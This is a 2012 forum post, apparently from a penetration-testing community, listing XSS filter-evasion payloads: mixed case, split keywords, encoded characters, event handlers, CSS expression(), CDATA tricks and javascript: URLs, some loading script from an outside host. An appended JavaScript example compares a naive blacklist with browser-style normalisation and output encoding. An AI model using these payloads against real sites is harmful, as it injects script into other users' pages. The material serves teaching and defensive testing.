中国网络渗透测试联盟
Title: Introduction to Cross Site Scripting (XSS) attack techniques
Author: admin
Time: 2012-12-31 09:59
1. Change the case of characters

<sCript>alert('d')</scRipT>
2. Add extra characters to evade regular-expression checks

<<script>alert('c')//<</script>

<SCRIPT a=">" SRC="t.js"></SCRIPT>

<SCRIPT =">" SRC="t.js"></SCRIPT>

<SCRIPT a=">" '' SRC="t.js"></SCRIPT>

<SCRIPT "a='>'" SRC="t.js"></SCRIPT>

<SCRIPT a=`>` SRC="t.js"></SCRIPT>

<SCRIPT a=">'>" SRC="t.js"></SCRIPT>
3. Use a different extension instead of .js

<script src="bad.jpg"></script>
4. Put JavaScript in a CSS file

<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

example:

body {
background-image: url('javascript:alert("XSS");')
}
5. Insert other characters into the script tag

<SCRIPT/SRC="t.js"></SCRIPT>

<SCRIPT/anyword SRC="t.js"></SCRIPT>
6. Use tab or newline to evade

(the gaps inside "javascript" in the three payloads below are tab or newline characters; they were flattened to spaces in this copy of the post)

<img src="jav ascr ipt:alert('XSS3')">

<img src="jav ascr ipt:alert('XSS3')">

<IMG SRC="jav ascript:alert('XSS');">

-> tab

-> new line
7. Use "\" to evade

<STYLE>@im\port'\ja\vasc\ript:alert("XSS32")';</STYLE>

<IMG STYLE='xss:expre\ssion(alert("XSS33"))'>

<IMG STYLE="xss:expr/*anyword*/ession(alert('sss'))">

<DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

<A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
8. Use hex encoding to evade (the ";" may also be dropped)

(the encoded forms were decoded when the board rendered the post, so they appear identical to the source lines)

<DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

Source: <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

Source: <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">
9. script in HTML tag

<body onload="alert('onload')">

onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload
10. XSS code contained in a .swf

<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
11. Use CDATA to split the XSS code and reassemble it.

<XML ID=I><X><C>
<![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
</C></X>
</xml>

<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>

<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
12. Use HTML+TIME.

<HTML><BODY>
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
<?import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" to="anyword<SCRIPT DEFER>alert("XSS")</SCRIPT>">
</BODY></HTML>
13. Write a cookie via META.

<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
14. javascript in src, href, url

<IFRAME SRC=javascript:alert('13')></IFRAME>

<img src="javascript:alert('XSS3')">

<IMG DYNSRC="javascript:alert('XSS20')">

<IMG LOWSRC="javascript:alert('XSS21')">

<LINK REL="stylesheet" HREF="javascript:alert('XSS24');">

<IFRAME SRC=javascript:alert('XSS27')></IFRAME>

<TABLE BACKGROUND="javascript:alert('XSS29')">

<DIV STYLE="background-image: url(javascript:alert('XSS30'))">

<STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS35')");}
</STYLE><A CLASS=XSS></A>

<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
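The following is an added example and is not part of the original post. It puts a hypothetical 2012-style blacklist filter (case-sensitive, keyed on the literal strings "<script>" and "javascript:") next to an approximation of what a browser does with an attribute value before it becomes a URL, and runs both over inputs constructed from categories 1, 2, 5, 6, 8 and 14 above. The point it demonstrates: pattern matching on the raw string is defeated by case changes, stray attribute text, tab/newline characters and numeric character references, while a check applied after decoding and whitespace stripping, or plain output encoding of untrusted text, is not. The decoding and URL pre-processing here follow the HTML and URL standards (character references decoded in attribute values; ASCII tab, LF and CR removed anywhere in a URL, C0 controls and space trimmed at the ends) but are a deliberately small subset, not a full parser. Several vectors in the post (expression(), DYNSRC/LOWSRC, HTML+TIME, DATASRC/DATAFLD, javascript: in an img src) only ever worked in old Internet Explorer; the script-tag, event-handler and javascript:-in-href/iframe vectors still work in every browser.

```javascript
// Added example, not part of the original post: a 2012-style blacklist
// filter beside the normalisation a browser applies to attribute values and
// URLs, run over payloads constructed from the categories listed above.

// Hypothetical blacklist filter of the kind the post is written to evade:
// case-sensitive, keyed on the literal strings "<script>" and "javascript:".
function naiveFilter(html) {
  return html
    .replace(/<script>/g, "")
    .replace(/<\/script>/g, "")
    .replace(/javascript:/g, "");
}

// Named character references that matter inside URL-valued attributes.
// HTML5 names are case-sensitive: "&Tab;" is valid, "&tab;" is not.
const NAMED_REFS = {
  Tab: "\t", NewLine: "\n", colon: ":", lt: "<", gt: ">", amp: "&", quot: '"',
};

// Decode character references the way an attribute value is decoded before
// the browser ever sees the URL: decimal (&#106;), hex (&#x6A;), with or
// without the trailing semicolon, plus the named references above.
function decodeEntities(s) {
  return s.replace(/&(#[xX][0-9a-fA-F]+|#[0-9]+|[A-Za-z][A-Za-z0-9]*);?/g, (m, ref) => {
    if (ref[0] === "#") {
      const hex = ref[1] === "x" || ref[1] === "X";
      const cp = hex ? parseInt(ref.slice(2), 16) : parseInt(ref.slice(1), 10);
      return Number.isFinite(cp) && cp <= 0x10ffff ? String.fromCodePoint(cp) : m;
    }
    return Object.prototype.hasOwnProperty.call(NAMED_REFS, ref) ? NAMED_REFS[ref] : m;
  });
}

// Approximate the URL parser's pre-processing: trim leading/trailing C0
// controls and space, then drop every ASCII tab, LF and CR wherever it
// appears. This is what makes "jav<TAB>ascript:" equal to "javascript:".
function normalizeUrl(value) {
  return decodeEntities(value)
    .replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, "")
    .replace(/[\t\n\r]/g, "");
}

// Scheme of the normalised URL, lower-cased, or null when there is none.
function urlScheme(value) {
  const m = /^([A-Za-z][A-Za-z0-9+.-]*):/.exec(normalizeUrl(value));
  return m ? m[1].toLowerCase() : null;
}

// A URL is script-bearing when its *normalised* scheme is javascript: or
// vbscript:; testing the raw string is exactly what the post's tricks defeat.
function isScriptUrl(value) {
  const scheme = urlScheme(value);
  return scheme === "javascript" || scheme === "vbscript";
}

// Output encoding is the defence that does not depend on recognising every
// evasion: untrusted text is escaped for the HTML text/attribute context it
// lands in, so no tag, attribute or scheme can be formed from it.
function encodeForHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Constructed sample inputs drawn from the post's categories 1, 2, 5, 6, 8 and 14.
const MARKUP_PAYLOADS = [
  "<script>alert(1)</script>",              // baseline: the blacklist does catch this one
  "<sCript>alert('d')</scRipT>",            // 1: case variation
  '<SCRIPT a=">" SRC="t.js"></SCRIPT>',     // 2: extra attribute containing ">"
  '<SCRIPT/SRC="t.js"></SCRIPT>',           // 5: "/" instead of whitespace
];
const URL_PAYLOADS = [
  "jav\tascr\nipt:alert('XSS3')",                                                // 6: raw tab/newline
  "jav&#x09;ascript:alert('XSS')",                                               // 6/8: encoded tab
  "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert('abc')", // 8: decimal references
  "&#x6A;avascript&colon;alert(1)",                                              // 8: hex and named references
  " JaVaScRiPt:alert(1)",                                                        // 1/14: leading space, mixed case
  "https://example.com/",                                                        // benign control
];

// Which markup payloads pass the blacklist untouched, and which URL payloads
// the normalised scheme check flags.
function evaluate() {
  return {
    bypassedNaive: MARKUP_PAYLOADS.filter((p) => naiveFilter(p) === p),
    scriptUrls: URL_PAYLOADS.filter(isScriptUrl),
    safeUrls: URL_PAYLOADS.filter((u) => !isScriptUrl(u)),
  };
}

console.log(JSON.stringify(evaluate(), null, 2));
```

Run with `node` to see the three lists: every markup payload except the baseline passes `naiveFilter` unchanged, and every URL payload except the https control is flagged by `isScriptUrl`. The practical reading is that an input filter has to be applied to the same normalised form the browser will act on, and that for text destined for HTML the reliable control is `encodeForHtml`-style contextual output encoding rather than a blacklist.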
Welcome to 中国网络渗透测试联盟 (https://cobjon.com/)